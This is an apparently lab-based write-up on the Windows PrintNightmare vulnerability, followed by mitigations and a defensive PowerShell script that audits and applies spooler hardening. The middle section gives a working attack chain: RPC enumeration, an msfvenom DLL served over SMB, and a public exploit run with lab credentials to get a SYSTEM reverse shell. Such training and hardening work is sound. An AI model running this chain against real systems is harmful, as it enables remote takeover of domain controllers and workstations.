PrintNightmare

PRACTICE ! PRACTICE ! PRACTICE !

According to Microsoft, PrintNightmare is "a remote code execution vulnerability [that] exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights."

Microsoft defines the Print Spooler service as a service that runs on every Windows computer.

The Print Spooler service manages the printing process: it receives the files to be printed, queues them, schedules them, and manages the resulting print jobs.

Remember the early days when users had to wait for a print job to finish before doing anything else? The Print Spooler service took care of that for us. It is also important to note that the Print Spooler service is enabled by default on all Windows clients and servers.

Domain Controllers mainly use the Print Spooler service for printer pruning (removing printers that are no longer in use on the network but were added as objects to Active Directory). Printer pruning stops users from reaching out to a printer that no longer exists.

As per Microsoft, to exploit the CVE-2021-1675 vulnerability the attacker needs direct or local access to the machine in order to use a malicious DLL file to escalate privileges.

Meanwhile, to exploit the CVE-2021-34527 vulnerability, the attacker can inject the malicious DLL file remotely.

What makes PrintNightmare dangerous?

  • It can be exploited over the network; the attacker doesn't need direct access to the machine.

  • The proof-of-concept was made public on the Internet.

  • The Print Spooler service is enabled by DEFAULT on domain controllers and workstations, and it runs with SYSTEM privileges.

Let's first check whether the DC is vulnerable to the PrintNightmare exploit. To do this, dump the RPC endpoint information and look for the print system protocols:

$ impacket-rpcdump @10.10.52.18 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

Okay, the print system RPC interfaces are exposed, so it is likely vulnerable. Now create a malicious.dll using msfvenom, host an SMB server on that directory, and run the exploit:

$ impacket-smbserver share `pwd` -smb2support
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Let's run the exploit now and observe that we get a reverse shell on our listener!

$ python3 CVE-2021-1675.py Finance-01.THMdepartment.local/sjohnston:mindheartbeauty76@10.10.52.18 '\\10.8.74.51\share\malicious.dll'
[*] Connecting to ncacn_np:10.10.52.18[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \10.8.74.51\share\malicious.dll
[*] Try 1...
[*] Try 2...
[*] Try 3...

And BOOM! We have a reverse shell on our listener with SYSTEM privileges :)

Mitigation Strategies

  • Disable the Print Spooler service, where that is appropriate for your environment.

  • Disable inbound remote printing through Group Policy.

Remember that for the Group Policy change to take effect across the domain, or even on the local machine, you need to issue a gpupdate /force command.
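To check a host for the two mitigations above and optionally apply one of them, here is an added PowerShell script (example code, not from the original write-up). It assumes an elevated prompt and uses the policy-backed registry values Microsoft documents for "Allow Print Spooler to accept client connections" (RegisterSpoolerRemoteRpcEndPoint, 2 = disabled) and Point and Print driver installation (RestrictDriverInstallationToAdministrators, 1 = admins only); in a domain, set the same values through a GPO rather than on each machine.

```powershell
# Added example: audit PrintNightmare mitigations on one Windows host and,
# with -Remediate, apply the chosen one. Run from an elevated PowerShell prompt.
param(
    [switch]$Remediate,        # apply a mitigation instead of only reporting
    [switch]$DisableSpooler    # with -Remediate: stop and disable the service entirely
)

$printersKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'
$pnpKey      = Join-Path $printersKey 'PointAndPrint'

function Get-PolicyValue([string]$Path, [string]$Name) {
    # Returns $null when the key or value is absent (policy "not configured").
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Set-PolicyValue([string]$Path, [string]$Name, [int]$Value) {
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    New-ItemProperty -Path $Path -Name $Name -Value $Value -PropertyType DWord -Force | Out-Null
}

$spooler  = Get-Service -Name Spooler
$remote   = Get-PolicyValue $printersKey 'RegisterSpoolerRemoteRpcEndPoint'
$restrict = Get-PolicyValue $pnpKey 'RestrictDriverInstallationToAdministrators'

Write-Host ("Spooler service            : {0} (start type {1})" -f $spooler.Status, $spooler.StartType)
Write-Host ("Inbound remote printing    : {0}" -f $(if ($remote -eq 2)   { 'disabled (OK)' } else { 'ALLOWED' }))
Write-Host ("Driver install admins-only : {0}" -f $(if ($restrict -eq 1) { 'yes (OK)' }      else { 'NO' }))

if (-not $Remediate) { return }

if ($DisableSpooler) {
    # Suitable where the host never prints or prunes printers; removing the
    # service removes the exposed RPC interfaces entirely.
    Stop-Service -Name Spooler -Force
    Set-Service  -Name Spooler -StartupType Disabled
    Write-Host 'Print Spooler stopped and disabled.'
} else {
    # Keep local printing but refuse remote clients and non-admin driver
    # installs, then restart the spooler so the RPC endpoint change takes effect.
    Set-PolicyValue $printersKey 'RegisterSpoolerRemoteRpcEndPoint' 2
    Set-PolicyValue $pnpKey      'RestrictDriverInstallationToAdministrators' 1
    Restart-Service -Name Spooler -Force
    Write-Host 'Remote printing disabled; driver installation restricted to administrators.'
}
```

Run it without switches first to see the current state; re-running afterwards (or after gpupdate /force on domain-joined hosts) confirms the settings actually landed.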
